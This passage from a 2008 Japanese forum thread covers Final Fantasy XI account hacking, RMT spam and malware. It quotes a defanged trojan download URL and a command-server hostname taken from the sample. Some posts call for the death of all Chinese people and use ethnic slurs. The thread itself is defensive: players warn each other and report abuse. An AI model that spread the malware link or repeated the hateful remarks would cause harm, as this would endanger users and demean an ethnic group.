/anon してないと、サーチひっかかるし。

789 名前:既にその名前は使われています:2008/09/20(土) 21:24:13 ID:uhqL65UJ
今朝anonしてたけど名無しメッセが届きました。
友達になろうよ!だけのメッセでしたが
プロフィールは公開してないので、趣味が同じ等の理由で
フレ登録がくるような状況ではないのです。
GMコールしてみたところ、名無しはPOL上から登録を
申し込んだのだろう。RMTに関する情報としてSTTへ報告を
してもらえると幸いであるとのことでした(要約してあります)

受信拒否することでこちらが不利益になる情報は渡らないと
言われましたが、やっぱり気味が悪いですね。
うっかりメッセならいいけど、それならネーム名前消さないよね…。

790 名前:既にその名前は使われています:2008/09/20(土) 23:28:52 ID:qEHAWLNM
age
つかsage荒らし来てるのかね?
お気に入りのスレがいくつもいきなり落ちてるw

791 名前:既にその名前は使われています:2008/09/20(土) 23:36:50 ID:1r73rTCq
>>790
スレ保持数の関係で定期的にスレ番300まで圧縮されてるんじゃないかな?

792 名前:既にその名前は使われています:2008/09/20(土) 23:41:13 ID:U8Cd4yl0
sageと落ちるのに何が関係あるのかわからない

793 名前:既にその名前は使われています:2008/09/20(土) 23:46:40 ID:gU1vtPer
>>790
ID:iXjUQ91d だな

>>792
目立たないようにsageながら大量のスレを保守する奴がいる

794 名前:既にその名前は使われています:2008/09/20(土) 23:59:11 ID:2xSQoEPW
>>792
新たな書き込みを見る事で賑わっている、と判断し保守ageを怠る事を期待したsage進行。

795 名前:既にその名前は使われています:2008/09/21(日) 01:32:14 ID:JR9zXrVl
おやすみ前の217からあげ

796 名前:既にその名前は使われています:2008/09/21(日) 01:56:10 ID:/kS80AVD
PS2使いだけど昨日初めて英語のRMT広告みたいなのがPOLにきたな。
かなりびびった。

797 名前:既にその名前は使われています:2008/09/21(日) 02:42:31 ID:VrkGexcy
先ほどゲーム内で見知らぬキャラからtellがきました。

内容は
???????>>I Quit... http://www■geocities■com/tempupload77/ffxiwarper.zip Enjoy
というものでした(送り主の名前は?で伏せ、URL内のドットは全て■にしました)

送り主に返信しても離席設定で届かず暫くするとサーチにかからなくなり
怪しさ全開なのですが。

ハックやウィルスに詳しい方 お暇でしたら上記URLを閲覧するとどうなるか教えていただけませんでしょうか?

798 名前:既にその名前は使われています:2008/09/21(日) 02:43:04 ID:SruM6EHv
業者くさいのからtellが来て、URLが乗ってた。
こんなの飛ぶ奴はいないと思うけど、多分アカハック系だと思う。
フレにも数人来てた。
必要だったらURL転載するけど、とりあえず自重。

799 名前:既にその名前は使われています:2008/09/21(日) 02:44:10 ID:SruM6EHv
>>797
これとまったく同じだ。
鯖はどこ?こっちは狼。

800 名前:既にその名前は使われています:2008/09/21(日) 02:49:39 ID:VrkGexcy
>>799
同じく狼です こわいねぇ

zipの前のコロンを■にし忘れていました ごめんなさい。

801 名前:既にその名前は使われています:2008/09/21(日) 03:04:19 ID:2Oie9f1/
>>797
zipの中身はffxiwarper.exeというファイル1個で、Avast!でWin32 Trojan:Genが検出された。

具体的にどうなるかは試してない。

802 名前:既にその名前は使われています:2008/09/21(日) 03:09:57 ID:VrkGexcy
>>801
情報ありがとうございます。
見知らぬ人物からのオススメURLでトロイ検出は
ネトゲ関連のトロイと考えていれば怪我はなさそうですね。

803 名前:既にその名前は使われています:2008/09/21(日) 03:18:34 ID:jD6Yw3lm
ffxiwarper.zipをVirusTotalに投げた結果
ttp://www.virustotal.com/analisis/0f50667074d177c5de36adf4028dcb62

中のexeをstringsしたらffxiserver77.no-ip.orgという文字列があった。
これはアメリカにあるホスト。

804 名前:既にその名前は使われています:2008/09/21(日) 03:22:14 ID:QKbSkeMh
俺も狼ですが、鯖スレやまわりのフレにもまったく同じ文章が送られており
頭文字が後半の自分にも送られてきたため、かなりの人数に送られていると思います

他鯖のかたも注意されたし

805 名前:既にその名前は使われています:2008/09/21(日) 03:23:30 ID:QKbSkeMh
「鯖スレ」→「鯖スレ住人」に訂正

806 名前:既にその名前は使われています:2008/09/21(日) 03:23:45 ID:LzgbETIY
もはや何でもありだな。MMO運営するのも大変だなこりゃ。


807 名前:既にその名前は使われています:2008/09/21(日) 03:24:30 ID:VrkGexcy
>>803
情報ありがとうございます。
ハックした内容をそこへ送るとかでしょうね。

上記URLにアクセスしないのが一番ですね。

808 名前:既にその名前は使われています:2008/09/21(日) 03:29:14 ID:LQ8JD8Zi
どうせ中国人だろ?ホントにトラブルしか起こさない連中だな。
一人残らず死んでほしい。

809 名前:既にその名前は使われています:2008/09/21(日) 03:36:29 ID:Z90sZbBS
最近シナ畜業者も露骨になってきたな〜
焦ってるのかね?

810 名前:797:2008/09/21(日) 03:36:44 ID:VrkGexcy
情報のお寄せありがとうございました。
業者の根絶を祈りつつ、これから寝ることにします。

ではまた。

811 名前:既にその名前は使われています:2008/09/21(日) 07:05:36 ID:QS4Art6L
age

812 名前:既にその名前は使われています:2008/09/21(日) 07:18:03 ID:4VWPi9V8
>>809
規制も厳しくなってるしなぁ
一般の客は今後更に危険にさらされる機会が増える、一層セキュリティには気をつけないとね。
スクエニもこれまで以上のスピードで対応しないと俺らが困るw
最近はスクエニもユーザー本意の対応になってきただろうか?
地震など災害への対応も日々怠りなく。

813 名前:既にその名前は使われています:2008/09/21(日) 10:02:54 ID:QOwb+w9l
LS内で2名ほど、RMTサイトからフレンド登録しませんか?
とのメールが来てたとの報告が。
新手のアカハックでしょか?
差出人は−−−−になってるそうです。

814 名前:既にその名前は使われています:2008/09/21(日) 10:25:51 ID:QOwb+w9l
失礼しました。すでに上がってたようですね、
たぶん同じ業者からのメールですね。
ちなみに爺鯖です。

815 名前:既にその名前は使われています:2008/09/21(日) 11:05:56 ID:qeovS2WG
テルきたりメッセきてる=垢ハックされた!?ではない。
されてないから安心しろ。
気持ち悪いのはたしかだけど。


816 名前:既にその名前は使われています:2008/09/21(日) 11:09:29 ID:krOOkH8X
一人暮らしの女子大生のところに、ハァハァ(;´Д`)電話がかかってくるようなものだと
思えばいい。

817 名前:既にその名前は使われています:2008/09/21(日) 12:28:22 ID:h0ZvgzpO
>>816
それは絶対嫌です

818 名前:既にその名前は使われています:2008/09/21(日) 12:45:08 ID:1jk5dKIb
業者「お前のIDとパスよこせよ(;´Д`)ハァハァ」


819 名前:既にその名前は使われています:2008/09/21(日) 13:07:55 ID:FZ8DTlzw
>>818
フイタwww

820 名前:既にその名前は使われています:2008/09/21(日) 15:32:21 ID:UiWLhQw4
247
ここが賑わってないのはいいことだ

821 名前:既にその名前は使われています:2008/09/21(日) 17:21:55 ID:0RFZ2r2m
あげ

822 名前:既にその名前は使われています:2008/09/21(日) 19:17:02 ID:1t848tQI
254サルベんジ

823 名前:既にその名前は使われています:2008/09/21(日) 19:20:58 ID:0RFZ2r2m
>>797 米ジオのアカウントでtopページなし。
yohoo.comにabuse report送っときました。
no-ip.orgはDDNSサービス
ffxiserver77.no-ip.orgはアクセスできなくなってて実際のIP不明
沈静化してるのか飛び石連休でみんなお出かけなのかw
静かなのはいいことだ ハァハァ

824 名前:既にその名前は使われています:2008/09/21(日) 21:08:01 ID:WeiWpL4i
オンラインゲームに潜む影――あなたのキャラクターは大丈夫?(後編)
ttp://plusd.itmedia.co.jp/games/articles/0809/19/news078.html
読んだよ

825 名前:既にその名前は使われています:2008/09/21(日) 21:15:22 ID:4VWPi9V8
>>823
国内向けのハックよりもユーザーが多くリスクがより少ない北米などにターゲット変えたのではないでしょうか?
海外の攻略サイト見てる人はこれから要注意ですね。

826 名前:既にその名前は使われています:2008/09/21(日) 22:09:34 ID:Pm7oIwCl
アメリカにやったら仕返し何されるかw

827 名前:既にその名前は使われています:2008/09/21(日) 23:00:47 ID:WeiWpL4i
fc2アクセス解析レンタルしたまま忘れてました
今日みたらアクセス最大ページ数120ページまでなのに
1000個も知らないページが登録してありました
ハックですか?

828 名前:既にその名前は使われています:2008/09/21(日) 23:14:15 ID:ddgdEnw8
おやすみ前のあげ。

829 名前:既にその名前は使われています:2008/09/21(日) 23:58:33 ID:VnB6isqG
age

830 名前:既にその名前は使われています:2008/09/22(月) 00:39:49 ID:YWZ3zaew
>>825
米でやるほうがリスクが大きいっしょ
日本はネット関連の処罰法がまったく整ってないから、こっちのほうがやりやすいはず

831 名前:既にその名前は使われています:2008/09/22(月) 00:41:10 ID:Ru8FyPGa
用語辞典くそ重い
このご時世だからもう何もかもこえー

832 名前:既にその名前は使われています:2008/09/22(月) 00:48:29 ID:UpKzgIhf
そういや不正アクセスがアメリカからだった場合、
日本の警察に被害届出せば、犯人逮捕される可能性ってあるんかな?


833 名前:既にその名前は使われています:2008/09/22(月) 00:57:25 ID:vQ9En+cr
>>832
どうせ中継だけだから無理でしょ

834 名前:既にその名前は使われています:2008/09/22(月) 01:22:31 ID:FYwlFwav
>>832
結果がどうあれ警察に届け出は必要でしょ。

835 名前:既にその名前は使われています:2008/09/22(月) 02:27:16 ID:VGYOoWlK
215からあげ

836 名前:既にその名前は使われています:2008/09/22(月) 04:34:58 ID:vQ9En+cr
203からあげ

837 名前:既にその名前は使われています:2008/09/22(月) 08:59:24 ID:5eVFCYEw
age

838 名前:既にその名前は使われています:2008/09/22(月) 10:46:15 ID:Nc252uVF
アメリカには日本よりスーパーハカーが居てなんとかしてくれるはず

839 名前:既にその名前は使われています:2008/09/22(月) 11:53:31 ID:EYmmg+9B
普段PS2オンリーで連休で実家のPCでやってたらやられたわ・・・
セキュリティざるだったので自業自得だが
6年間積み上げてきた物が1日でボロクソにされるのはきついな・・・
とりあえず新パスにしてもらったが
支払い方法がwebマネからクレカに、全キャラ鯖移転させられてたっぽい
支払い方法は治してくれるみたいだけど、
キャラはもう巻き戻し申し込むしかないよなあ
キャラ名被ってて変えなきゃいけなくなってたら鬱だ

840 名前:既にその名前は使われています:2008/09/22(月) 12:14:48 ID:siUjfnpr
最近中華の爆撃をあまり見ないと思ったら、どうもアラド方面に進出しているようだ。
パクリブログもアラドブログのパクリだったりするし。

見つけた福建中華のパクリブログ
ttp://yaplog■jp/aradsummon/

プロフィール欄下部にinfosueekの幅30、高さ0のIFRAME。

タイトルとプロフィール欄、記事本文を別々のFC2ブログにあるアラドブログからパクっている。
タイトルはタイトルを検索すれば出てくる。
記事はちょっと長いが以下を検索すると一発で出てくる。
”知能による火力を夢見て、適当にノース知能布を揃えてみました。現在の街での知力が618、ララミスが発動すると700越します。”

気をつけてくれよな!

841 名前:既にその名前は使われています:2008/09/22(月) 12:52:29 ID:GVQz/btR
コマンドプロンプトに
(*´Д`)ハァハァ
をコピーして貼り付けてENTER。

842 名前:既にその名前は使われています:2008/09/22(月) 12:56:23 ID:7WFrQLWR


843 名前:既にその名前は使われています:2008/09/22(月) 13:21:25 ID:AqP0Ab4p
米ユーザーターゲットとかサイバー戦争勃発ですがな

844 名前:既にその名前は使われています:2008/09/22(月) 13:34:48 ID:sPZlyQQx
JPがやられ放題で、中の国に何もしてこないって事に味締めて、
市場の大きい米をターゲットにすればもっとうまぁwって思っちゃったのね

米がどういう国か知らない連中がやってるんだろうね

845 名前:既にその名前は使われています:2008/09/22(月) 15:30:03 ID:pt4h2p0f
239agu

846 名前:839:2008/09/22(月) 16:27:34 ID:Y80UH8sm
ゲームデータの復元を依頼したんだが
これ結構巻き戻されるんだよな?
垢ハックされる前日にタイダルタリスマンを
ゲーム内で受け取ってるんだがオワタっぽい?

5000円払って残ったのはウンコアクセサリーだけかよww

847 名前:既にその名前は使われています:2008/09/22(月) 16:35:50 ID:e+n11Cgg
先に伝えておけばなんとかしてくれるかもしれんしGMでもよんでみたら?
だめなら諦めるだけだなw

848 名前:既にその名前は使われています:2008/09/22(月) 16:38:45 ID:82t0HMa3
>>846
ん〜どうなんだろ。スクエニもそこまで想定していないと思うので
GMやサポセンに掛け合ってぜひ前例作ってくれ。

849 名前:既にその名前は使われています:2008/09/22(月) 16:49:28 ID:VFrBHiLv
同じアカが二回やられたケースってある?

850 名前:既にその名前は使われています:2008/09/22(月) 16:50:01 ID:z4afl7R9
ある

851 名前:既にその名前は使われています:2008/09/22(月) 17:06:44 ID:VFrBHiLv
こわいなー

852 名前:既にその名前は使われています:2008/09/22(月) 17:13:33 ID:6ri1VPRi
なんかキャラ選択画面で全画面モードを失ったとかエラーが出た。
垢ハックはPOLログインの時に落ちるんだっけ?

853 名前:839:2008/09/22(月) 17:25:57 ID:Y80UH8sm
チャットサービスで聞いて来たぜw

やはり基本的にアイテム補償はやらないってことみたいだけど
一応もしインゲームアイテムなくなってたらGMに問い合わせてくれとのこと。
アイテム救済措置の方でいけるかも
ついでにいつくらいのデータに巻き戻るのよ?って聞いたけど教えてくれなかった。
一応垢ハックされたのがわかった直前のデータとは言ってたけど怪しいなw

854 名前:既にその名前は使われています:2008/09/22(月) 17:40:08 ID:91l0G81R
私はハック受ける一日前に巻き戻しでした。
NM倒してアイテム取ってたのに、張り込みしている時の状態だった。


855 名前:839:2008/09/22(月) 17:48:10 ID:Y80UH8sm
お、じゃあ運が良ければいけそうか?
一応送付書類にも不正アクセス受けた日時かなり正確に書いといた

856 名前:既にその名前は使われています:2008/09/22(月) 17:50:29 ID:id/qzxBW
元締はロシア、アメリカで労働者が中国等アジア。
ターゲットは日本、韓国、アメリカ、ドイツ。
でOK?

857 名前:既にその名前は使われています:2008/09/22(月) 18:13:49 ID:VFrBHiLv
何人くらい被害が出たとか数字出てないの?

858 名前:既にその名前は使われています:2008/09/22(月) 18:18:56 ID:Nc252uVF
■eしか知りえない情報だし、■eは開示する気無いからな。

859 名前:既にその名前は使われています:2008/09/22(月) 19:11:49 ID:4CN1VSIy
そんな■的に不利な情報開示する訳が無い

860 名前:既にその名前は使われています:2008/09/22(月) 19:45:38 ID:ek+j7OI3
DB調べなきゃわからんての

861 名前:既にその名前は使われています:2008/09/22(月) 19:53:09 ID:thKm4rhT
スレチだが中華すげえな
ttp://www.yomiuri.co.jp/atmoney/news/20080919-OYT1T00011.htm
こんなもん絶対中国企業にソース流れるだろうし
そうなると勝手に国内の製品に他国のセキュリティー技術取り込んだり
他国製品の攻撃が可能になるよな
もう、ハッキング国家って言っていいな


862 名前:既にその名前は使われています:2008/09/22(月) 19:54:39 ID:XYytP5i+
食品関係でもそうだけれど
中華のやる事なす事信じられない。

863 名前:既にその名前は使われています:2008/09/22(月) 19:55:16 ID:DqUFUKK2
スレチってわかってるのに貼るバカ

864 名前:既にその名前は使われています:2008/09/22(月) 19:57:40 ID:82t0HMa3
売らなきゃいいだけだしな。
最初からソース公開されてるLinux+Firefoxとかいいんじゃねーの?

865 名前:既にその名前は使われています:2008/09/22(月) 21:06:16 ID:82t0HMa3
216age

866 名前:既にその名前は使われています:2008/09/22(月) 21:06:46 ID:82t0HMa3
ってsageチェック外れてなかった

867 名前:既にその名前は使われています:2008/09/22(月) 21:09:16 ID:ek+j7OI3
>>861
リンクは踏みたくないが
国内販売するIT製品のソースコード全部晒せってやつかな?
いいんでない
自国にはコピー技術しかないことが痛いほど判明するだろw

868 名前:既にその名前は使われています:2008/09/22(月) 21:14:28 ID:+FG5FZBD
>>857
国内だけなら週間で問い合わせ人数が数百人
認定された人数はちょっと判らん。

869 名前:既にその名前は使われています:2008/09/22(月) 23:17:08 ID:rDipaBrJ
250フライドチキン

870 名前:既にその名前は使われています:2008/09/22(月) 23:17:48 ID:PBGJqUqz
age

871 名前:既にその名前は使われています:2008/09/23(火) 00:06:37 ID:zWGEhuxf
強制終了の症状なのですが、最近
FFからログアウト→POLからメッセージ作成中
文章を打って何度かEnterキーで確定すると落ちるようになりました。
キーロガーを防止するフリーソフト、Nologgerを導入したところ
その症状は治りました。
これ、やられてますかね・・・?今のところ実害はないのですが。
(POLのログインはソフトウェアキーボードを使っています。)

872 名前:既にその名前は使われています:2008/09/23(火) 00:55:58 ID:F/4gSRY+
おやすみ前のあげ

873 名前:既にその名前は使われています:2008/09/23(火) 00:56:12 ID:l+eha6ts
>>839
戻ってきたときに名前変わるの嫌なら、
別アカがあるならその名前を確保しとくとか、
ないなら親しいフレにメインキャラの名前だけ確保しといてもらえ。
そうすりゃ戻ってきたときに、確保しといたキャラ削除で元の名前使える。

874 名前:既にその名前は使われています:2008/09/23(火) 02:10:25 ID:cfwbkyVE


875 名前:既にその名前は使われています:2008/09/23(火) 02:35:59 ID:1kgexk31


876 名前:既にその名前は使われています:2008/09/23(火) 02:36:35 ID:tDWc3YNk


877 名前:既にその名前は使われています:2008/09/23(火) 02:37:13 ID:rWQYgeqf


878 名前:既にその名前は使われています:2008/09/23(火) 03:30:02 ID:teiLMd4Q


879 名前:既にその名前は使われています:2008/09/23(火) 03:59:33 ID:3iu82t+p


880 名前:既にその名前は使われています:2008/09/23(火) 04:06:44 ID:+yw5idfe


881 名前:既にその名前は使われています:2008/09/23(火) 04:13:03 ID:qAVCpxjo


882 名前:既にその名前は使われています:2008/09/23(火) 04:14:18 ID:d7vKlaHg
はらへった

883 名前:既にその名前は使われています:2008/09/23(火) 04:50:06 ID:tb0p3FBa


884 名前:既にその名前は使われています:2008/09/23(火) 05:45:05 ID:+WxZZbGl


885 名前:既にその名前は使われています:2008/09/23(火) 05:59:38 ID:Dd9LmS+6


886 名前:既にその名前は使われています:2008/09/23(火) 07:33:08 ID:vVchXBEn


887 名前:既にその名前は使われています:2008/09/23(火) 07:33:48 ID:duCkt7TY


888 名前:既にその名前は使われています:2008/09/23(火) 09:34:45 ID:XIFXo8sc


889 名前:既にその名前は使われています:2008/09/23(火) 09:44:05 ID:8zb2yrNw
やだ・・・何この流れ・・・

890 名前:既にその名前は使われています:2008/09/23(火) 10:21:31 ID:81A7AHmG
獣使いwikiでFF11マップガイド(ネット便利)が危険って書いてあるけど、
これまだ危険なの?
つい最近見ちゃったけど何とも無い
Noscript入れといて良かったわ
ヴァナMAPが無くなってから地図サイト困ってるんだよなぁ


891 名前:既にその名前は使われています:2008/09/23(火) 10:28:15 ID:n5hvIAsJ
>>890 ネット便利さんは改ざんの直後 レンタルサーバを引っ越し済み
黒魔メモさんも改ざん部分は対応済みですから
現状どちらも大ジョブだと思いますよ。


892 名前:既にその名前は使われています:2008/09/23(火) 10:29:51 ID:ovQ23Rjo
>最近見ちゃったけど何とも無い

安全・危険は業者の気分次第・管理側のセキュリティで変動するから絶対安全ってものはないし。

現在安全かどうかは知らないが、ハックするストックが多くて順番まち状態かも知れないのにこの考え方は危険じゃね。

893 名前:既にその名前は使われています:2008/09/23(火) 10:30:42 ID:ovQ23Rjo
スマンうっかり行間あいてる・・・

894 名前:既にその名前は使われています:2008/09/23(火) 10:53:36 ID:7JBeCaiP
>>890
Noscript入れてたならわかると思うけど
反応しなければ改竄されてないってことだべw

895 名前:既にその名前は使われています:2008/09/23(火) 11:16:46 ID:81A7AHmG
おーそうか
逆に獣wikiが情報更新するの放置してるってことだなw
フレの多数がネット便利使ってるはずだから心配だったが安心したぜ
皆あんがとなー

896 名前:既にその名前は使われています:2008/09/23(火) 12:44:58 ID:+hEvZWa/
polhook.dllって何ですか?

XPの時計つついたらカスペルが、
新規または修正モジュールがなんたらかんたらで
polhook.dllの変更を許可するか?ってメッセージが出てきたんだけど・・・。

897 名前:既にその名前は使われています:2008/09/23(火) 13:28:44 ID:8JJFJtK/
一回改竄されたことのあるHPだし、たとえ今安全でも今後どの瞬間に改竄されるかもわからない

ってことを念頭に置いて閲覧しろよ

898 名前:既にその名前は使われています:2008/09/23(火) 13:49:28 ID:+WxZZbGl
>>896
スクエニが忍ばせたアレです

899 名前:既にその名前は使われています:2008/09/23(火) 14:17:22 ID:XjdYoqJo
>>895
正直スマンカッタ
ネット便利と黒魔メモも対応済みにしました


900 名前:既にその名前は使われています:2008/09/23(火) 14:29:01 ID:qKETor0V
チャットサービスで巻き戻し1~2 週間かかると言われたけどそれ以上とみたほうがいい?

901 名前:既にその名前は使われています:2008/09/23(火) 16:12:23 ID:45YCIkJl


902 名前:既にその名前は使われています:2008/09/23(火) 16:27:07 ID:MXYLWNEC
>>900
> チャットサービスで巻き戻し1~2 週間かかると言われたけどそれ以上とみたほうがいい?
一般企業なら10日前後と受け取っていいが
スクエニなので+一週間はみなさい

903 名前:既にその名前は使われています:2008/09/23(火) 18:34:29 ID:BHpBTJFY
保守

904 名前:既にその名前は使われています:2008/09/23(火) 18:44:31 ID:qKETor0V
てことは3週間か。
巻き戻しサービスあるだけましか。

905 名前:既にその名前は使われています:2008/09/23(火) 19:06:04 ID:xQxmE3KC


906 名前:既にその名前は使われています:2008/09/23(火) 19:08:09 ID:bCHS+vQc
今までの話からすると、1〜2週間も巻き戻ってるほうがまれ
オレの場合数時間前だった

907 名前:既にその名前は使われています:2008/09/23(火) 19:09:00 ID:bCHS+vQc
ああ、巻き戻しにかかる期間か
忘れてくれ orz

908 名前:既にその名前は使われています:2008/09/23(火) 21:26:13 ID:UXOSanwY
最近はだいぶ落ち着いてきたのかね?
一時期定時集合系コンテンツ行く度に誰かが引っかかってたが最近は聞かなくなった

909 名前:既にその名前は使われています:2008/09/23(火) 21:33:20 ID:3ppZqjM5
ヤフオクの垢つー金蔓に注力し始めたんじゃないのか

910 名前:既にその名前は使われています:2008/09/23(火) 22:19:01 ID:YY+cip2S
一瞬の油断が命取り

911 名前:既にその名前は使われています:2008/09/23(火) 23:59:39 ID:VzURTp+m
ほす

912 名前:既にその名前は使われています:2008/09/24(水) 00:52:00 ID:Ek2YrNmf
FF11WARNING管理人です。連絡と提案です。
topページだけ見て帰ったようですが9/21の生ログでmiku.xrea.jp/template/に
proxy1.square-enix.co.jp からのアクセスがありました。
リファラがime.nuで、つまりこのスレからとんできてました!
個人としてか組織としてかはわかりませんが
少なくともスクエニ社内からこのスレをチェックしているようです。
(imenu経由のスクエニのアクセスログは初めてみましたw)

当方はスレを参考にさせていただいていますし 情報収集もさせていただいていますが
スレの内容であっても当方で扱わない話題も多々ありますしスレ維持に携わっているわけでもありません。
このまま状況が落ち着くようであれば、
以前にも話題になっていた「スレのまとめサイト」を作ることを提案します。
スレの性質上管理運用の問題がどうしても避けて通れない問題ですので
必要であれば出すぎたことではありますが軌道に乗るまでの管理運営は当方で行ってもかまいません。
その辺のご検討ご意見をいただければと思います。
スレにはお世話になってるのでコピペでも情報を蓄積できればいいなぁ、なんて考えたわけです。

まとめなんて必要ないぜ(*´Д`*)ハァハァであればスルーしといてください。私も忘れますw
書き逃げになりますが寝ます。おやすみなさい。

913 名前:既にその名前は使われています:2008/09/24(水) 01:00:06 ID:eCsRlsou
結構前のことかもしれないが、業者のサイト潰したスーパーハカーいなかったっけ?
あんな人に活躍して欲しいな・・・。

914 名前:既にその名前は使われています:2008/09/24(水) 02:15:35 ID:Mvuti9AG
>>912
まとめサイトのご提案、否はありません
このスレとしてもFF11WARNINGさんへの誘導を多々行っていますので
作っていただければ嬉しい限りだと思います
ただ、ジオであれば安全であるとは申せませんが、できればミラーの
ほうにも載せていただけると嬉しいです

915 名前:既にその名前は使われています:2008/09/24(水) 02:19:51 ID:zo6xJ05D
別事案の垢ハック事案でもジャンプ元がここで
足跡残しまくりだから
■は昔から体質は変わっていない

916 名前:既にその名前は使われています:2008/09/24(水) 04:15:34 ID:Mvuti9AG
216からシュシュ

917 名前:既にその名前は使われています:2008/09/24(水) 05:57:11 ID:yhhAA3vm
お早うのシュシュ

918 名前:既にその名前は使われています:2008/09/24(水) 07:13:23 ID:dCT6ndf1
本気age

919 名前:既にその名前は使われています:2008/09/24(水) 08:27:14 ID:0OycixaT
>>912
結局プレミアサイトなんて必要はなかったんだよな。

920 名前:既にその名前は使われています:2008/09/24(水) 10:22:32 ID:VP1b5tV+
Firefox3.0.2揚げ

921 名前:既にその名前は使われています:2008/09/24(水) 12:27:52 ID:LUwLcWdK
RMT関係を本気でアカバンすると
売り手と買い手で相当数が解約になって
ゲームなりたたなくなるんじゃね?w

それが怖くて■の対応鈍いんじゃないかと勝手に想像

922 名前:既にその名前は使われています:2008/09/24(水) 12:38:21 ID:hbj5mEPU
よくも悪くもRMTあるから続けてるってのもあるね
売って引退できなきゃとっくに辞めてるかな

923 名前:既にその名前は使われています:2008/09/24(水) 12:44:59 ID:AIJeKsqx
初期組からしてみりゃRMTなんて要らん。いわゆる『必要悪』なんかでない。必要ない悪なんだ。
RMTのない頃は、皆それなりに目的持ってコツコツ金貯めてた。
それをRMTと業者が超インフレ引き起こして、頑張ってもどうにもならない世界にしたんだ

RMTないと続けていけない奴は業者と一緒に辞めればいい

924 名前:既にその名前は使われています:2008/09/24(水) 12:49:15 ID:V1dMZG+a
金策潰されたのは業者が24時間稼動で素材乱獲・釣り上げ・NM独占したからだしな。
そしてRMTerにギル売って、その利益で垢ハック開発。
もちろん、垢ハックは業者のお客様であるRMTerも対象外ではございません。

925 名前:既にその名前は使われています:2008/09/24(水) 13:20:34 ID:02TC7Zxv
>>922
なら、結局時給いくらでFF11何年やってたか計算してみ?w

926 名前:既にその名前は使われています:2008/09/24(水) 13:31:47 ID:15q2Gggd
今は垢で検索するとタル♀スレも引っ掛かるんだよなぁ

927 名前:既にその名前は使われています:2008/09/24(水) 13:33:59 ID:kR1AEZV1
タル♀NGスレッドにいれろw

928 名前:既にその名前は使われています:2008/09/24(水) 13:52:34 ID:zdmIbLTt
今の給料のまま中国行ったら、田舎じゃ豪邸に住めるよ

929 名前:既にその名前は使われています:2008/09/24(水) 14:01:27 ID:iFK1UQtK
>>923-924
でもちゃんと運営がそれに対応していけていれば
インフレ等起こさずに済んだんだよね

■の対応の悪さも大きな要因だと思うよ


930 名前:既にその名前は使われています:2008/09/24(水) 14:50:15 ID:duSqV/c/
212からあげ

931 名前:既にその名前は使われています:2008/09/24(水) 14:56:10 ID:79mS7vzp
ここ2日くらい決まった時間に、PG2が何かをブロックしてる。
先々週も似たようなことあってスキャンしたんだけど、何も出てこないし、被害もなし。
ソフトのアップデート先がブロック対象国だったりするから、それなのかなあ。
こういう被害が増えてくると、安全かどうか見極めがつかなくておっかないね。

932 名前:既にその名前は使われています:2008/09/24(水) 15:02:32 ID:qhNFcDY4
>>931
IPからある程度調べられるから、確認してから許可汁

933 名前:既にその名前は使われています:2008/09/24(水) 15:52:11 ID:qlmWUKb/
AH久しぶりに覗いたらすげぇ勢いで香港IPはじきまくってたから注意してくれよな

934 名前:既にその名前は使われています:2008/09/24(水) 16:00:28 ID:eVaAL+9s
みるなよw

935 名前:既にその名前は使われています:2008/09/24(水) 16:04:31 ID:79mS7vzp
>>932
先々週のも今回のも、IP調べたら大学と出ました。
踏み台にされてて元が業者だろうからやられたなと思ったんだけど、3種類のソフトでスキャン
したんだけど、何も出てきてません。
今のところ被害がないので、余計に怖いです。


936 名前:既にその名前は使われています:2008/09/24(水) 16:47:27 ID:hbj5mEPU
>>925
現実の稼ぎに換算したらだれもやらんよ

937 名前:既にその名前は使われています:2008/09/24(水) 16:58:40 ID:cCOs+p+4
「Firefox 3.0.2」公開、5件の脆弱性を修正
http://internet.watch.impress.co.jp/cda/news/2008/09/24/20933.html


938 名前:既にその名前は使われています:2008/09/24(水) 16:59:26 ID:cCOs+p+4
>また、Firefox 2についても、脆弱性などを修正した「Firefox 2.0.0.17」をリリースした。Firefox 2.0.0.17では、Firefox 3.0.2と同様の脆弱性を含む合計9件の脆弱性を修正している。

939 名前:既にその名前は使われています:2008/09/24(水) 17:43:29 ID:8uIW4Fmy
まだFx2出すのか…もう切れよ

940 名前:既にその名前は使われています:2008/09/24(水) 17:45:38 ID:jYhseEZg
あと3ヶ月の命なんだから勘弁したれ

941 名前:既にその名前は使われています:2008/09/24(水) 19:01:32 ID:jYhseEZg
213

942 名前:既にその名前は使われています:2008/09/24(水) 20:30:51 ID:dkukcpch
POLシャットダウン時にエラー
マシンシャットダウン時に時間がかかる
この2つの現象が起きたのでカスペでスキャンしたが何も検出されず

心あたりは昨日間違えて白地図本舗開いたくらい
ブサウザはオペラでP2Gが何かブロックしてる形跡は今のところ無し
これはまずいでしょうか?

943 名前:既にその名前は使われています:2008/09/24(水) 20:34:59 ID:CCb6+GH6
hostsファイルを一週間に一度手動で更新してるんだけど、
Spybot-S&Dのhosts更新と合わせると凄まじい行数になるね
個人的にJ-word関連も登録してるけど

944 名前:既にその名前は使われています:2008/09/24(水) 20:35:23 ID:hbj5mEPU
後悔する前にパス変えて
レジストリ見といたほうがいいんでない

945 名前:既にその名前は使われています:2008/09/24(水) 20:47:13 ID:dkukcpch
wなんとかの方はレジストリ検索しても無かったです
他のはまだ見ていないので帰宅したら試してみます

946 名前:既にその名前は使われています:2008/09/24(水) 21:33:47 ID:qhNFcDY4
>>942
POLのほうは怪しいけど、PG2使ってるとWINDOWSのシャットダウンが遅くなることがある
一度PG2を手動で終了させてからシャットダウンしてみ

947 名前:既にその名前は使われています:2008/09/24(水) 22:27:16 ID:viNTHcJr
Firefox 3.0.2 age

948 名前:942:2008/09/24(水) 23:29:15 ID:Tw1OQ2Nz
>>944 >>946 ありがとうございます
帰宅したので3種ともレジストリ検索しましたが見つからず
パスワードを変えて動向を伺う事にします

949 名前:既にその名前は使われています:2008/09/24(水) 23:47:56 ID:qhNFcDY4
200↑

950 名前:既にその名前は使われています:2008/09/25(木) 00:07:57 ID:OL3NEHb7
おやすみ前のあげ。

951 名前:既にその名前は使われています:2008/09/25(木) 01:47:49 ID:sayLKFZE
「無料のノートン」広告で偽ソフト配布先に誘導、英Sophosが警告
http://internet.watch.impress.co.jp/cda/news/2008/09/24/20940.html

952 名前:既にその名前は使われています:2008/09/25(木) 01:58:08 ID:04jl2VNQ
先日アカハックされたんだが、LSコミュからパス抜かれたりするの?
全くの素人でどこでやられたか検討が…


953 名前:既にその名前は使われています:2008/09/25(木) 02:19:07 ID:IflnUyKr
キミはLSコミュにどうやってログインするんだい?

954 名前:既にその名前は使われています:2008/09/25(木) 02:21:07 ID:IflnUyKr
つか最近はやったのはどこでやられたのかわからない系だから
